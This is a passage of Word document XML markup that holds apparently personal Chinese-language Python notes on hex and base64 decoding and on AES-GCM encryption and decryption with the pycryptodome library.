      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>十六进制字符串到解码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00011099" w14:textId="77777777" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">decoded_data = </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3742">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>binascii.unhexlify</w:t>
      </w:r>
      <w:r>
        <w:t>(hex_string)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E66F09" w14:textId="1CBC00C7" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码则</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3742">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>binascii.hexlify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3E819C" w14:textId="77777777" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将解码后的字节数据转换为字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFF4777" w14:textId="77777777" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>decoded_text = decoded_data.decode('utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E657B92" w14:textId="77777777" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="468623F4" w14:textId="564253A0" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>print(decoded_text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57057133" w14:textId="77777777" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22526E11" w14:textId="77777777" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12FDD916" w14:textId="77777777" w:rsidR="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07FF6045" w14:textId="77777777" w:rsidR="00DD3742" w:rsidRPr="00DD3742" w:rsidRDefault="00DD3742" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB6DA60" w14:textId="77777777" w:rsidR="00244F7B" w:rsidRDefault="00244F7B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD1D2AC" w14:textId="54639FCB" w:rsidR="00244F7B" w:rsidRDefault="000F7D59" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="512" w:name="_Toc159779952"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="512"/>
    </w:p>
    <w:p w14:paraId="1C9D6D53" w14:textId="77777777" w:rsidR="00244F7B" w:rsidRDefault="00244F7B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34412A81" w14:textId="59B88F86" w:rsidR="00244F7B" w:rsidRDefault="00C80ECB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意区分传入的编码、字节类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E45191" w14:textId="20329D81" w:rsidR="00244F7B" w:rsidRDefault="000F7D59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000F7D59">
        <w:t>key = base64.b64decode(key.encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C5DD48" w14:textId="77777777" w:rsidR="000F7D59" w:rsidRDefault="000F7D59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1500CC88" w14:textId="77777777" w:rsidR="000F7D59" w:rsidRDefault="000F7D59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29AEA586" w14:textId="77777777" w:rsidR="000F7D59" w:rsidRDefault="000F7D59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A7592E" w14:textId="77777777" w:rsidR="000F7D59" w:rsidRDefault="000F7D59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E7F6CF" w14:textId="68A1AEF2" w:rsidR="00D33AFE" w:rsidRDefault="00244F7B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="513" w:name="_Toc159779953"/>
      <w:r w:rsidRPr="00244F7B">
        <w:t>pycryptodome</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00D33AFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密解密</w:t>
      </w:r>
      <w:bookmarkEnd w:id="513"/>
    </w:p>
    <w:p w14:paraId="2FB61733" w14:textId="77777777" w:rsidR="00D33AFE" w:rsidRDefault="00D33AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C6AD40" w14:textId="18ADDDEE" w:rsidR="00D33AFE" w:rsidRDefault="00244F7B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00244F7B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pycryptodome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00244F7B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00244F7B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>yCrypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的替代版本，各方面进行了改进</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D8008E" w14:textId="77777777" w:rsidR="00D33AFE" w:rsidRDefault="00D33AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="650F581C" w14:textId="6FB3A33F" w:rsidR="00D33AFE" w:rsidRDefault="00FD3877" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="514" w:name="_Toc159779954"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AESGCM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密解密</w:t>
      </w:r>
      <w:bookmarkEnd w:id="514"/>
    </w:p>
    <w:p w14:paraId="473B841F" w14:textId="77777777" w:rsidR="00D33AFE" w:rsidRDefault="00D33AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB8E8DE" w14:textId="77777777" w:rsidR="00B90B89" w:rsidRDefault="00B90B89" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>binascii</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">hashlib </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Crypto.Cipher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>加密函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>encrypt_aes256gcm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ciphertext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>iv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bytes</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cipher = AES.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, AES.MODE_GCM, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>iv</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是密文部分，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>auth_tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> digest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>部分有认证功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># ed = cipher.encrypt(ciphertext)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ed, auth_tag = cipher.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>encrypt_and_digest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ciphertext</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ed+auth_tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>解密函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>decrypt_aes256gcm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
